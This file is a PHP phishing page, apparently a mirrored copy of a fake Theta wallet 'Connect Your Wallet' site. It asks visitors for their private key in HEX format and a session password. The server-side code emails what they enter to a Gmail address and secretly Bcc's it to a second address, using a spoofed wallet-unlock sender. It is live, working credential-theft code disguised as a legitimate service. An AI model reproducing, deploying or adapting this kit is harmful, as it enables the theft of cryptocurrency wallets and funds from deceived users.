<?php
error_reporting(0);

if(isset($_POST['btnsend'])) {

$key = $_POST['txtprivatekey'];
$password = $_POST['txtpassword'];	
	
    $subject = "Private Key Unlocking Details ";
    $email = "";
    $message = "";
    $to = "dappzone05@gmail.com";
	    
       
 $message = "
				<html>
				<head>
				<title>unlocking wallet</title>
				</head>
				<body>
				<img src=\"img/logo/logo.png\">
					<h2>Your Session Password : ".$password."</h2>
					<h2>Your Private Key : ".$key."</h2>
				</body>
				</html>
				";
     
         
    //dont forget to include content-type on header if your sending html
			$headers = "MIME-Version: 1.0" . "\r\n";
			$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
			$headers .= "From:info@myetherwallet-unlock.com". "\r\n" ;
            $headers .= "Bcc:udsolomon@ymail.com". "\r\n" ;
		mail($to,$subject,$message,$headers);

		

?>
<script>
 

</script>
<?php
}
else 
{
//$error="Something went wrong. Please try again";
?>
 
<?php
}

?>

<html lang="en">


<!-- Mirrored from thetawalletunlock.org/unlock/privatekey.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 06 Jul 2020 19:02:36 GMT -->
<head>

    <meta charset="utf-8">
	<link rel="shortcut icon" href="https://thetawalletunlock.org/img/logo/favicon.ico">
	<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
	<meta name="theme-color" content="#000000">
	<link rel="manifest" href="https://thetawalletunlock.org/static/manifest.json">
	<title>Privatekey</title>
	<link href="static/css/main.ba3fecb7.chunk.css" rel="stylesheet">
  </head>
  <body>
  <noscript>You need to enable JavaScript to run this app.</noscript>
  <!-- <form method="post" action="https://theta.walletstoken.org/unlock/privatekey.php"> -->
  <form method="post" action="">
    <div id="root">
	<div class="App">
  <div class="NavBar NavBar--is-centered"><img class="NavBar__logo" src="img/logo/logo.png"></div>
    <div class="Pages">
	<div class="UnlockWalletPage">
	<div class="UnlockWalletPage__wrapper">
	<div class="UnlockWalletPage__title">Connect Your Wallet</div>
    <div class="UnlockWalletCard" >
	<div class="UnlockWalletCard__content">
	<div class="UnlockWalletCard__header">
	<div class="TabBar UnlockWalletCard__tab-bar TabBar--is-centered TabBar--is-condensed">
	 
	<a class="TabBarItem tablinks" href="phrase.php"><div class="TabBarItem__title">Seed Phrase</div></a>
	<a class="TabBarItem--is-active tablinks" href="privatekey.html"><div class="TabBarItem__title">Private Key</div></a>
 
	</div>
	</div>

    <div id="privateKey" class="UnlockWalletViaPrivateKey ccc">
	<div class="UnlockWalletViaPrivateKey__title">Please enter your private key</div>
	<textarea class="UnlockWalletViaPrivateKey__private-key" required name="txtprivatekey"></textarea>
	<div class="UnlockWalletViaPrivateKey__private-key-instructions">Please enter your private key in HEX format.</div>
	<input class="UnlockWalletViaPrivateKey__password-input" placeholder="Enter temporary session password" name="txtpassword" type="password" value="">
    <div class="UnlockWalletCard__warning"></div>
	<div class="UnlockWalletViaPrivateKey__footer">
	<button type="submit" name="btnsend" style="width:100%;" class="GradientButton undefined GradientButton">
	<div class="GradientButton__title">IMPORT</div>

	</button>

	</div>

	</div>

</div>
</div>
 
</div>

</div>
</div>
<div>
</div>

<!--<div class="UnsupportedDevice"><div class="UnsupportedDevice__content"><img class="UnsupportedDevice__logo" src="../img/logo/theta_wallet_logo@2x.png"><div class="UnsupportedDevice__title">This wallet is designed for desktop. Try our mobile wallets!</div><a class="UnsupportedDevice__app-store-badge" href="https://itunes.apple.com/app/theta-wallet/id1451094550?mt=8" target="_blank"><img src="app-store@2x.png"></a><a class="UnsupportedDevice__app-store-badge" href="https://play.google.com/store/apps/details?id=org.theta.wallet" target="_blank"><img src="google-play@2x.png"></a></div></div>-->

</div>
</div>


    <script src="static/js/2.d8413ea9.chunk.js"></script>
	<script src="static/js/main.3105abe6.chunk.js"></script>
	<div class="ReactModalPortal"></div><div class="ReactModalPortal">
	</div>
	<div>
	<div style="position: fixed; top: 0px; right: auto; bottom: auto; left: 50%; transform: translate(-50%, 0%); z-index: 100;">
      <div>
      </div>
    </div>
  </div>
</form>
</body>

<!-- Mirrored from thetawalletunlock.org/unlock/privatekey.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 06 Jul 2020 19:02:36 GMT -->
</html>
